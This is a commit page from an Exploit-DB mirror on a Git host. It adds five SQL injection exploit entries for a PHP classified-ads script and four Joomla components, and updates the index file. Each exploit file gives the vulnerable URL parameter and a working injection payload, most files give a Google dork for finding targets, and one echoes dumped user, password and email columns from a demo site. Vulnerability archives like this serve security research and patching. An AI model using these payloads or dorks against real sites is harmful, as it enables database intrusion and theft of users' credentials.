bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-03-03

Browse source 
5 new exploits

Php Classified OLX Clone Script - 'category' Parameter SQL Injection
Joomla! Component Abstract 2.1 - SQL Injection
Joomla! Component StreetGuessr Game 1.0 - SQL Injection
Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection
Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-03-03 05:01:17 +00:00
parent 846ce42eca
commit a3ee969c7d
6 changed files with 102 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -37396,6 +37396,7 @@ id,file,description,date,author,platform,type,port
41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
41478,platforms/hardware/webapps/41478.txt,"DLink DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0
41492,platforms/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0
41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80
41484,platforms/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80
@ -37406,3 +37407,7 @@ id,file,description,date,author,platform,type,port
41489,platforms/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
41490,platforms/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' Parameter SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0
41493,platforms/php/webapps/41493.txt,"Joomla! Component Abstract 2.1 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

23
platforms/php/webapps/41492.txt Executable file
View file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Php Classified OLX Clone Script - SQL Injection
# Google Dork: N/A
# Date: 02.03.2017
# Vendor Homepage: https://wptit.com/
# Software: https://wptit.com/portfolio/php-classified-website-sale/
# Demo: http://www.adsthem.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?search_key=IhsanSencan&category=[SQL]
# -30+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))-- -
# Etc....
# :username<li>atulya_moderators
# :password<li>atulya_moderators
# :fullname<li>atulya_moderators
# :email<li>atulya_moderators
# # # # #

19
platforms/php/webapps/41493.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_abstract
# Date: 02.03.2017
# Vendor Homepage: http://joomla6teen.com/
# Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/
# Demo: http://demo.joomla6teen.com/abstractmanager
# Version: 2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=[SQL]
# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]
# 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
# # # # #

18
platforms/php/webapps/41494.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component StreetGuessr Game v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_streetguess
# Date: 02.03.2017
# Vendor Homepage: https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
# Demo: https://www.streetguessr.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_streetguess&view=leaderboard&id=[SQL]
# 7'+/*!50000Procedure*/+/*!50000Analyse*/+(/*!50000extractvalue*/(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,/*!50000@@version*/)),0)-- -
# # # # #

18
platforms/php/webapps/41495.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component Guesser v1.0.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_guesser
# Date: 02.03.2017
# Vendor Homepage: http://www.bitsgeo.com/
# Software: https://extensions.joomla.org/extensions/extension/marketing/guesser/
# Demo: http://www.bitsgeo.com/guesson/
# Version: 1.0.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/guessers?type=[SQL]
# 'and(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x3c3c3c,0x7e,0x496873616e2053656e63616e))+from information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables group+by+x)a)+AND+'Ihsan'='Sencan
# # # # #

19
platforms/php/webapps/41496.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component Recipe Manager v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_recipe
# Date: 02.03.2017
# Vendor Homepage: http://joomla6teen.com/
# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/recipe-manager/
# Demo: http://demo.joomla6teen.com/recipemanager/
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_recipe&view=recipes&task=print_ingred&id=[SQL]
# 10'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #